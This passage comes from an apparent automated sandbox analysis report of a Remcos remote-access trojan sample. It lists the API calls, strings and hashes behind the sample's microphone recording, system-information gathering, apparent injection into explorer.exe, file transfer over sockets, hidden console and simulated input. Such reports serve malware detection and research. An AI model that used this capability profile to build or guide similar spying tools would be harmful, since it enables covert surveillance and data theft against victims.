                                                                                                                                        • _free.LIBCMT ref: 0044821C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                                        • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                                                                        • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                                        • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 100059EA
                                                                                                                                          • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                          • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                        • _free.LIBCMT ref: 100059F6
                                                                                                                                        • _free.LIBCMT ref: 10005A01
                                                                                                                                        • _free.LIBCMT ref: 10005A0C
                                                                                                                                        • _free.LIBCMT ref: 10005A17
                                                                                                                                        • _free.LIBCMT ref: 10005A22
                                                                                                                                        • _free.LIBCMT ref: 10005A2D
                                                                                                                                        • _free.LIBCMT ref: 10005A38
                                                                                                                                        • _free.LIBCMT ref: 10005A43
                                                                                                                                        • _free.LIBCMT ref: 10005A51
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                        • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                        • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                        • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                        APIs
                                                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DecodePointer
                                                                                                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                        • API String ID: 3527080286-3064271455
                                                                                                                                        • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                                                                        • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                                                                                                        • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                                                                        • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                                                                                                        APIs
                                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                                                                          • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                        • API String ID: 1462127192-2001430897
                                                                                                                                        • Opcode ID: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                                                                                                                                        • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                                                                                                        • Opcode Fuzzy Hash: f12e1a09c6e255144d90da2c79bf1f1cd4418c09111891b4f18985c985915801
                                                                                                                                        • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,?,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                                        • API String ID: 2050909247-4242073005
                                                                                                                                        • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                                                                        • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                                                                                                        • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                                                                        • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                                                                                                        APIs
                                                                                                                                        • _strftime.LIBCMT ref: 00401D50
                                                                                                                                          • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                                        • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                                                                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                        • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                                                                        • API String ID: 3809562944-243156785
                                                                                                                                        • Opcode ID: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                                                                                        • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                                                                                                        • Opcode Fuzzy Hash: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                                                                                        • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                                                                                                        APIs
                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                                                                        • int.LIBCPMT ref: 00410EBC
                                                                                                                                          • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                          • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                                                        • String ID: ,kG$0kG
                                                                                                                                        • API String ID: 3815856325-2015055088
                                                                                                                                        • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                                                                        • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                                                                                                        • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                                                                        • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                                                                                                        APIs
                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                                                                        • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                                                                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                                                                        • waveInStart.WINMM ref: 00401CFE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                        • String ID: dMG$|MG$PG
                                                                                                                                        • API String ID: 1356121797-532278878
                                                                                                                                        • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                                                                        • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                                                                                                        • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                                                                        • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                                                                          • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                                                                                                          • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                                                                                                          • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                                                                        • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                                                                                        • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                                                                                        • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                                                                        • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                                                                        • GetMessageA.USER32 ref: 0041D591
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                        • String ID: Remcos
                                                                                                                                        • API String ID: 1970332568-165870891
                                                                                                                                        • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                                                        • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                                                                                        • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                                                                        • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                                                                                        • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                                                                        • Opcode Fuzzy Hash: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                                                                                        • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                                                                        APIs
                                                                                                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                                                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                                                                                                        • __freea.LIBCMT ref: 00454083
                                                                                                                                        • __freea.LIBCMT ref: 0045408F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 201697637-0
                                                                                                                                        • Opcode ID: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                                                                                                        • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                                                                        • Opcode Fuzzy Hash: d666079201eac34123aff993431e960db56ae36dfd708acf9a18ada5241d4519
                                                                                                                                        • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                                                                        • _free.LIBCMT ref: 00445515
                                                                                                                                        • _free.LIBCMT ref: 0044552E
                                                                                                                                        • _free.LIBCMT ref: 00445560
                                                                                                                                        • _free.LIBCMT ref: 00445569
                                                                                                                                        • _free.LIBCMT ref: 00445575
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                        • String ID: C
                                                                                                                                        • API String ID: 1679612858-1037565863
                                                                                                                                        • Opcode ID: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                                                                                                        • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                                                                        • Opcode Fuzzy Hash: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                                                                                                                        • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: tcp$udp
                                                                                                                                        • API String ID: 0-3725065008
                                                                                                                                        • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                        • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                                                                        • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                        • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                                                                        APIs
                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                                                        • ExitThread.KERNEL32 ref: 004018F6
                                                                                                                                        • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                                                                                                          • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                        • String ID: PkG$XMG$NG$NG
                                                                                                                                        • API String ID: 1649129571-3151166067
                                                                                                                                        • Opcode ID: 550caf075e583e476d87b570dd8e50d88aac4017f2d84a61fa09579770db8c75
                                                                                                                                        • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                                                                                                        • Opcode Fuzzy Hash: 550caf075e583e476d87b570dd8e50d88aac4017f2d84a61fa09579770db8c75
                                                                                                                                        • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                                                                                                        • MoveFileW.KERNEL32 ref: 00407AA5
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                                                                                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                                                                          • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                                                                                          • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                        • String ID: .part
                                                                                                                                        • API String ID: 1303771098-3499674018
                                                                                                                                        • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                                                                        • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                                                                        • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                                                                        • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                                                                        APIs
                                                                                                                                        • AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                                                        • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Console$Window$AllocOutputShow
                                                                                                                                        • String ID: Remcos v$5.1.3 Pro$CONOUT$
                                                                                                                                        • API String ID: 4067487056-2212855755
                                                                                                                                        • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                                                                        • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                                                                                        • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                                                                        • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                                                                                        APIs
                                                                                                                                        • SendInput.USER32 ref: 00419A25
                                                                                                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
